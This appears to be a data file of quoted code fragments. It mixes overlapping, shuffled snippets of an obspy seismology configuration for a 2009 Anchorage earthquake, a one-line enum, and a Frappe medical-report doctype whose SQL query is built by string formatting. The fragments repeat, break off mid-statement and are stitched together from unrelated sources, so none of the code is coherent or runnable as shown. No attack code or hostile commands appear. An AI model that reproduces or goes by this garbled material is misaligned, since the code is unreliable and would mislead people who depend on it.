"0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat =",
"and fill the missing component with a null trace (MPEN) #Be sure to",
"2016 # [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK'",
"def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example event (Anchorage) if iex == 0:",
"= 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog =",
"#ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel",
"steps ev_info.ifverbose = True #keep stations with missing components and fill the missing",
"FLATS 2014 # <NAME> 2015 # XG WVF 2016 # [7C MMEP 2015]",
"#ev_info.isave_raw = True #ev_info.isave_raw_processed = True ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat",
"50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF",
"-149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq = 50 ev_info.scale_factor =",
"ev_info.resample_freq = 50 ev_info.scale_factor = 100 #ev_info.phase_window = False #-------for specfem------------ #ev_info.tbefore_sec =",
"files can be used when checking if you are receiving all the data",
"# XR ARCTIC 2004 # XZ STEEP 2005 # YV MOOS 2006 #",
"'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428 ev_info.edep = 33033.60",
"event (Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist",
"of Alaska networks # note 1: cannot use '*' because of IM #",
"ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag =",
"False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152",
"as reof from getwaveform import * def get_ev_info(ev_info,iex): # =============================================================== # SilwalTape2016 example",
"300 ev_info.tbefore_sec = 100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose =",
"= True #keep stations with missing components and fill the missing component with",
"ev_info.isave_ENZ = False #ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon",
"'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel = 'BH?' ev_info.use_catalog = 0 ev_info.elat = 61.45420 ev_info.elon = -149.7428",
"missing component with a null trace (MPEN) #Be sure to set the null",
"= -152 #ev_info.max_lon = -147 # default list of Alaska networks # note",
"component to 0 in the weight file when running cap #ev_info.icreateNull = 1",
"-149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon = -149.7428 #",
"ev_info.elon = -149.7428 ev_info.edep = 33033.60 # ev_info.rlat = 61.45420 # ev_info.rlon =",
"# TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network =",
"0 #RAW and ENZ files can be used when checking if you are",
"300 #output all proccessing steps ev_info.ifverbose = True #keep stations with missing components",
"#ev_info.isave_ENZ = True #ev_info.min_lat = 59 #ev_info.max_lat = 62 #ev_info.min_lon = -152 #ev_info.max_lon",
"STEEP 2005 # YV MOOS 2006 # XV FLATS 2014 # <NAME> 2015",
"= 100 ev_info.tafter_sec = 300 #output all proccessing steps ev_info.ifverbose = True #keep",
"1: cannot use '*' because of IM # note 2: may want to",
"# ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq =",
"default list of Alaska networks # note 1: cannot use '*' because of",
"61.45420 # ev_info.rlon = -149.7428 # ev_info.rtime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.emag = 4.6 ev_info.resample_freq",
"if iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist = 0",
"WVF 2016 # [7C MMEP 2015] # TA #ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network =",
"YV MOOS 2006 # XV FLATS 2014 # <NAME> 2015 # XG WVF",
"#ev_info.min_lon = -152 #ev_info.max_lon = -147 # default list of Alaska networks #",
"specfem------------ #ev_info.tbefore_sec = 0 #ev_info.resample_TF = False #ev_info.scale_factor = 1 #ev_info.outformat = 'DISP'",
"#RAW and ENZ files can be used when checking if you are receiving",
"= 'AK,AT,AV,CN,II,IU,US,XM,XV,XZ,YV' #ev_info.network = 'AK' # for testing ev_info.network = 'AK,AT,AV,CN,II,IU,US,XM,TA,XE,XR,XZ,YV,XV,ZE,XG' ev_info.channel =",
"(Anchorage) if iex == 0: ev_info.use_catalog = 0 ev_info.otime = obspy.UTCDateTime(\"2009-04-07T20:12:55.351\") ev_info.min_dist =",
"all proccessing steps ev_info.ifverbose = True #keep stations with missing components and fill",
"#keep stations with missing components and fill the missing component with a null"
] |
[
"<reponame>tinmarr/Alien-Fisher-Man from enum import Enum class COL_TYPE(Enum): ELASTIC = 1 STATIC = 2"
] |
[
"\"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if",
"ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung =",
"ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in",
"see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document from",
"ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") #",
"# ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\")",
"# if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\")",
"= patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"]",
"get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt",
"from frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def",
"data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if",
"for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") #",
"\"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if",
"data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt =",
"formatdate class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in self.ausgangslage: #",
"in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut =",
"korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data",
"# ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte =",
"# korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung:",
"and contributors # For license information, please see license.txt from __future__ import unicode_literals",
"ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte",
"patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"]",
"mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name",
"import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import formatdate class",
"frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \"",
"\"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\",",
"> 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] =",
"\"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for",
"data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee =",
"= '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True)",
"if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return data else: return",
"= korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\")",
"korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung =",
"`tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name",
"ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\",",
"= ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\")",
"data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user),",
"\"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\",",
"len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"]",
"`name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"]",
"employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] =",
"@frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if",
"if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"]",
"FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] =",
"mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] =",
"if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" +",
"# if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\")",
"contributors # For license information, please see license.txt from __future__ import unicode_literals import",
"# For license information, please see license.txt from __future__ import unicode_literals import frappe",
"= '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id`",
"+ \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = ''",
"korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut",
"import frappe from frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass",
"self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\",",
"# ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut:",
"(c) 2019, libracore and contributors # For license information, please see license.txt from",
"korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") #",
"= ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung",
"\"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\",",
"from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage",
"= ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz:",
"\"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat)",
"\"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if",
"= {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\",",
"mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return data else: return False",
"<gh_stars>0 # -*- coding: utf-8 -*- # Copyright (c) 2019, libracore and contributors",
"please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document",
"if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] =",
"Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self): # for",
"MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte:",
"korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: #",
"For license information, please see license.txt from __future__ import unicode_literals import frappe from",
"frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self):",
"as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if",
"ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\",",
"frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0:",
"validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\",",
"\"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if",
"\"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\",",
"if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") #",
"frappe from frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass #",
"ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: #",
"Copyright (c) 2019, libracore and contributors # For license information, please see license.txt",
"frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in",
"if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") #",
"def get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt:",
"= '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] =",
"= frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) >",
"ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung =",
"'' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if",
"import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document): pass # def validate(self): #",
"# korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat:",
"korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat = frappe.get_doc(\"Mandat\",",
"__future__ import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import formatdate",
"self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\",",
"ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") #",
"patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] =",
"korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") #",
"unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import formatdate class MedizinischerBericht(Document):",
"patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee",
"WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else:",
"else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = ''",
"from __future__ import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import",
"# korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung =",
"# if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\")",
"= korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung",
"`user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"]",
"# if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\")",
"data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else:",
"utf-8 -*- # Copyright (c) 2019, libracore and contributors # For license information,",
"ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte",
"frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum,",
"+ patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = ''",
"in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte =",
"# ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung:",
"ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung",
"data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else:",
"= korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\")",
"ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: #",
"-*- # Copyright (c) 2019, libracore and contributors # For license information, please",
"{} if mandat: mandat = frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt)",
"= ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut",
"data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return",
"# for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\")",
"\"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\",",
"# for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\")",
"# korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\")",
"= frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] =",
"ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: #",
"# ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz",
"= ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\")",
"class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in self.ausgangslage: # if",
"korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist()",
"'' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return data else:",
"mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy')",
"korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\",",
"if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") #",
"license information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document",
"= employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"]",
"'{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = ''",
"= '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt:",
"korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\",",
"\" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] =",
"else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee`",
"# korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut =",
"else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = ''",
